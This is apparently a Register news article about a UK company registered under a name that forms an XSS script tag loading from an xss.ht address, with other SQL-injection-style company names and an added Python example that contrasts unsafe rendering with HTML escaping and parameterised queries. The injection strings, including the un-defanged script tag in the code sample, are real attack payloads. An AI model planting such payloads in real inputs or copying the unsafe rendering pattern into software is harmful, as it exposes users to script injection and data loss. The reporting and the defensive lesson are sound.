Why, yes, you can register an XSS attack as a UK company name. How do we know that? Someone actually did it

And the 'acceptable company name' charset is hardcoded... in legislation


Companies House has blocked someone who registered a new biz with a name that contained the right characters arranged in the right order to trigger a cross-site scripting (XSS) attack against users of the service's API.

The company in question, registered number 12956509, was originally signed up with the UK's official company registrar under the name:

">< SCRIPT SRC[=]HTTPS[:]//MJT.XSS.HT> LTD

The registered name didn't contain the square brackets (we've added them above to defang it), meaning anyone rendering company names straight off the Companies House API into a web page would potentially run a script from the web address above.

A person using the username michaeltandy on the Companies House developer forum later posted: "I had assumed I wouldn't be the first person to use < and > (they are, after all, both explicitly whitelisted as legal characters) and that 99 per cent of systems would already be escaping them... I would just get a company with a playful name that would elicit a knowing chuckle from the kind of people we'd be doing business with!"

The poster continued: "Once it turned out there were non-trivial problems, and that fact became more widely publicised, we can't expect every consumer of data to do a full XSS audit in only a few days."

Although whoever registered the company seems to have had non-hostile intentions – xss.ht is a domain owned by the XSS Hunter service, as explained on its main website – the vulnerability it exposes is not unique.

Such tomfoolery has been carried out in the past, aided by a legal requirement that certain punctuation marks are available for companies to use in their names. Thus was born "; DROP TABLE "COMPANIES";-- LTD" and "SAFDASD & SFSAF \' SFDAASF\" LTD", both of which were exploiting the availability of punctuation marks to put commands into the company name field.

Tech lawyer Neil Brown of decoded.legal told The Register: "This is symbolic – if one might excuse the pun – of a regime which considers individual characters in isolation, and not the effect of the combination of those characters." He explained that while section 53 of the Companies Act 2000 does stop people from registering companies with "offensive" names or names that were a criminal offence to publish, it's not clear whether that is enough to stop people registering database commands as company names.

"Would using an XSS attack constitute an offence? Even with the state of the Computer Misuse Act 1990, that would be a stretch too far. Is it offensive? I don't think so, but then I'm not the Secretary of State," opined Brown, who also pointed out yet another crappy company name.

As for lessons to be drawn from this, Brown wondered if simply advising people to sanitise inputs from official systems was "too dull" for El Reg. We happen to agree but it's also the sort of common-sense advice someone, somewhere, might actually benefit from. The BBC Bitesize guide to input sanitisation (don't laugh, we all started somewhere) can be found here.
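As an added illustration (not code from the article or from Companies House), here are the two dull-but-effective measures that lesson points at, applied to constructed copies of the names in this story: contextual HTML escaping for the script-tag name, and a parameterised query for the DROP TABLE name.

```python
import html
import sqlite3

# Constructed sample values modelled on the names in the article; the script
# name is given as it was registered, without the defanging square brackets.
COMPANY_NAMES = [
    '"><SCRIPT SRC=HTTPS://MJT.XSS.HT> LTD',
    '; DROP TABLE "COMPANIES";-- LTD',
    r'SAFDASD & SFSAF \' SFDAASF\" LTD',
]


def render_name_unsafe(name: str) -> str:
    """The defect: API data interpolated straight into HTML. The first sample
    name closes the title attribute and the <li> tag, then injects a script."""
    return f'<li title="{name}">{name}</li>'


def render_name_safe(name: str) -> str:
    """Escape for the context the data lands in. quote=True also turns " and '
    into entities, which is what keeps the attribute value from being closed."""
    safe = html.escape(name, quote=True)
    return f'<li title="{safe}">{safe}</li>'


def store_names(names):
    """Parameterised insert: the name is bound as data, so the DROP TABLE name
    is stored verbatim rather than executed. Returns (table still exists, rows)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE companies (number TEXT, name TEXT)")
    for i, name in enumerate(names):
        # Company numbers here are placeholders, not real registrations.
        conn.execute("INSERT INTO companies VALUES (?, ?)", (f"PLACEHOLDER-{i}", name))
    table_present = conn.execute(
        "SELECT count(*) FROM sqlite_master WHERE type='table' AND name='companies'"
    ).fetchone()[0] == 1
    stored = [row[0] for row in conn.execute("SELECT name FROM companies ORDER BY rowid")]
    conn.close()
    return table_present, stored
```

The same rule generalises: escape on output for whatever context the string is going into (HTML text, attribute, URL, shell), and bind data as parameters rather than pasting it into a query.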

A Companies House spokesman told The Register: "A company was registered using characters that could have presented a security risk to a limited number of our customers, if published on unprotected external websites. We have taken immediate steps to mitigate this risk."

He added: "We are confident that Companies House services remain secure."

And indeed Companies House is secure: company number 12956509 is now called "THAT COMPANY WHOSE NAME USED TO CONTAIN HTML SCRIPT TAGS LTD". ®

Bootnotes

Drop Table Companies Ltd (add the necessary script marks at your leisure) was a practical joke by tech bod Sam Pizzey, who blogged about it at the time. He wrote: "The company name is a bit of hacker sleight-of-hand... or as some astute people have put it, it's 'wrong'. Of course it's wrong – I'm not a total arsehole!"

Multiple people also registered Openreach Ltd over the years until BT woke up and registered the company name itself.

Biting the hand that feeds IT © 1998–2022